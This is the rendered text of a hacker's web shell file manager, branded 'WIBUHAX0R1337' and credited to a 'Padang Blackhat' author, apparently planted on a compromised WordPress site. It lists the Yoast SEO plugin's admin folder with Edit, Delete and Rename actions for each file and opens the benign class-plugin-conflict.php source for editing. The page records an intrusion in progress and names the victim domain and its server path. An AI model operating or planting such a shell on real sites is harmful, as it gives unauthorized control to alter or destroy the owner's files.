-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
wordpress-seo
/
admin
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
ajax
--
NONE
capabilities
--
NONE
endpoints
--
NONE
exceptions
--
NONE
filters
--
NONE
formatter
--
NONE
google_search_console
--
NONE
import
--
NONE
listeners
--
NONE
menu
--
NONE
metabox
--
NONE
notifiers
--
NONE
pages
--
NONE
roles
--
NONE
services
--
NONE
statistics
--
NONE
taxonomy
--
NONE
tracking
--
NONE
views
--
NONE
watchers
--
NONE
admin-settings-changed-listener.php
2.388KB
Edit File
Delete File
Rename
ajax.php
11.16KB
Edit File
Delete File
Rename
class-admin-asset-analysis-worker-location.php
1.806KB
Edit File
Delete File
Rename
class-admin-asset-dev-server-location.php
1.633KB
Edit File
Delete File
Rename
class-admin-asset-location.php
0.477KB
Edit File
Delete File
Rename
class-admin-asset-manager.php
20.066KB
Edit File
Delete File
Rename
class-admin-asset-seo-location.php
2.076KB
Edit File
Delete File
Rename
class-admin-editor-specific-replace-vars.php
6.343KB
Edit File
Delete File
Rename
class-admin-gutenberg-compatibility-notification.php
2.549KB
Edit File
Delete File
Rename
class-admin-help-panel.php
2.695KB
Edit File
Delete File
Rename
class-admin-init.php
10.713KB
Edit File
Delete File
Rename
class-admin-recommended-replace-vars.php
5.984KB
Edit File
Delete File
Rename
class-admin-user-profile.php
3.058KB
Edit File
Delete File
Rename
class-admin-utils.php
2.145KB
Edit File
Delete File
Rename
class-admin.php
12.727KB
Edit File
Delete File
Rename
class-asset.php
4.302KB
Edit File
Delete File
Rename
class-bulk-description-editor-list-table.php
2.051KB
Edit File
Delete File
Rename
class-bulk-editor-list-table.php
29.407KB
Edit File
Delete File
Rename
class-bulk-title-editor-list-table.php
2.232KB
Edit File
Delete File
Rename
class-collector.php
0.981KB
Edit File
Delete File
Rename
class-config.php
4.926KB
Edit File
Delete File
Rename
class-database-proxy.php
7.504KB
Edit File
Delete File
Rename
class-export.php
3.458KB
Edit File
Delete File
Rename
class-expose-shortlinks.php
7.085KB
Edit File
Delete File
Rename
class-gutenberg-compatibility.php
2.47KB
Edit File
Delete File
Rename
class-meta-columns.php
27.3KB
Edit File
Delete File
Rename
class-my-yoast-proxy.php
6.138KB
Edit File
Delete File
Rename
class-option-tab.php
2.215KB
Edit File
Delete File
Rename
class-option-tabs-formatter.php
2.837KB
Edit File
Delete File
Rename
class-option-tabs.php
2.257KB
Edit File
Delete File
Rename
class-paper-presenter.php
3.516KB
Edit File
Delete File
Rename
class-plugin-availability.php
10.063KB
Edit File
Delete File
Rename
class-plugin-conflict.php
4.044KB
Edit File
Delete File
Rename
class-premium-popup.php
2.808KB
Edit File
Delete File
Rename
class-premium-upsell-admin-block.php
7.827KB
Edit File
Delete File
Rename
class-primary-term-admin.php
7.348KB
Edit File
Delete File
Rename
class-product-upsell-notice.php
5.748KB
Edit File
Delete File
Rename
class-remote-request.php
3.128KB
Edit File
Delete File
Rename
class-schema-person-upgrade-notification.php
2.23KB
Edit File
Delete File
Rename
class-suggested-plugins.php
4.325KB
Edit File
Delete File
Rename
class-wincher-dashboard-widget.php
3.53KB
Edit File
Delete File
Rename
class-yoast-columns.php
3.518KB
Edit File
Delete File
Rename
class-yoast-dashboard-widget.php
3.96KB
Edit File
Delete File
Rename
class-yoast-form.php
35.739KB
Edit File
Delete File
Rename
class-yoast-network-admin.php
9.969KB
Edit File
Delete File
Rename
class-yoast-network-settings-api.php
4.181KB
Edit File
Delete File
Rename
class-yoast-notification-center.php
26.059KB
Edit File
Delete File
Rename
class-yoast-notification.php
9.823KB
Edit File
Delete File
Rename
class-yoast-notifications.php
7.629KB
Edit File
Delete File
Rename
class-yoast-plugin-conflict.php
10.326KB
Edit File
Delete File
Rename
index.php
0.037KB
Edit File
Delete File
Rename
interface-collection.php
0.251KB
Edit File
Delete File
Rename
interface-installable.php
0.248KB
Edit File
Delete File
Rename
<?php /** * WPSEO plugin file. * * @package WPSEO\Admin * @since 1.7.0 */ use Yoast\WP\SEO\Config\Conflicting_Plugins; /** * Contains list of conflicting plugins. */ class WPSEO_Plugin_Conflict extends Yoast_Plugin_Conflict { /** * The plugins must be grouped per section. * * It's possible to check for each section if there are conflicting plugin. * * NOTE: when changing this array, be sure to update the array in Conflicting_Plugins_Service too. * * @var array<string, array<string>> */ protected $plugins = [ // The plugin which are writing OG metadata. 'open_graph' => Conflicting_Plugins::OPEN_GRAPH_PLUGINS, 'xml_sitemaps' => Conflicting_Plugins::XML_SITEMAPS_PLUGINS, 'cloaking' => Conflicting_Plugins::CLOAKING_PLUGINS, 'seo' => Conflicting_Plugins::SEO_PLUGINS, ]; /** * Overrides instance to set with this class as class. * * @param string $class_name Optional class name. * * @return Yoast_Plugin_Conflict */ public static function get_instance( $class_name = self::class ) { return parent::get_instance( $class_name ); } /** * After activating any plugin, this method will be executed by a hook. * * If the activated plugin is conflicting with ours a notice will be shown. * * @param string|bool $plugin Optional plugin basename to check. * * @return void */ public static function hook_check_for_plugin_conflicts( $plugin = false ) { // The instance of the plugin. $instance = self::get_instance(); // Only add the plugin as an active plugin if $plugin isn't false. if ( $plugin && is_string( $plugin ) ) { $instance->add_active_plugin( $instance->find_plugin_category( $plugin ), $plugin ); } $plugin_sections = []; // Only check for open graph problems when they are enabled. if ( WPSEO_Options::get( 'opengraph' ) ) { /* translators: %1$s expands to Yoast SEO, %2$s: 'Facebook' plugin name of possibly conflicting plugin with regard to creating OpenGraph output. */ $plugin_sections['open_graph'] = __( 'Both %1$s and %2$s create Open Graph output, which might make Facebook, X, LinkedIn and other social networks use the wrong texts and images when your pages are being shared.', 'wordpress-seo' ) . '<br/><br/>' . '<a class="button" href="' . admin_url( 'admin.php?page=wpseo_page_settings#/site-features#card-wpseo_social-opengraph' ) . '">' /* translators: %1$s expands to Yoast SEO. */ . sprintf( __( 'Configure %1$s\'s Open Graph settings', 'wordpress-seo' ), 'Yoast SEO' ) . '</a>'; } // Only check for XML conflicts if sitemaps are enabled. if ( WPSEO_Options::get( 'enable_xml_sitemap' ) ) { /* translators: %1$s expands to Yoast SEO, %2$s: 'Google XML Sitemaps' plugin name of possibly conflicting plugin with regard to the creation of sitemaps. */ $plugin_sections['xml_sitemaps'] = __( 'Both %1$s and %2$s can create XML sitemaps. Having two XML sitemaps is not beneficial for search engines and might slow down your site.', 'wordpress-seo' ) . '<br/><br/>' . '<a class="button" href="' . admin_url( 'admin.php?page=wpseo_page_settings#/site-features#card-wpseo-enable_xml_sitemap' ) . '">' /* translators: %1$s expands to Yoast SEO. */ . sprintf( __( 'Toggle %1$s\'s XML Sitemap', 'wordpress-seo' ), 'Yoast SEO' ) . '</a>'; } /* translators: %2$s expands to 'RS Head Cleaner' plugin name of possibly conflicting plugin with regard to differentiating output between search engines and normal users. */ $plugin_sections['cloaking'] = __( 'The plugin %2$s changes your site\'s output and in doing that differentiates between search engines and normal users, a process that\'s called cloaking. We highly recommend that you disable it.', 'wordpress-seo' ); /* translators: %1$s expands to Yoast SEO, %2$s: 'SEO' plugin name of possibly conflicting plugin with regard to the creation of duplicate SEO meta. */ $plugin_sections['seo'] = __( 'Both %1$s and %2$s manage the SEO of your site. Running two SEO plugins at the same time is detrimental.', 'wordpress-seo' ); $instance->check_plugin_conflicts( $plugin_sections ); } }
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat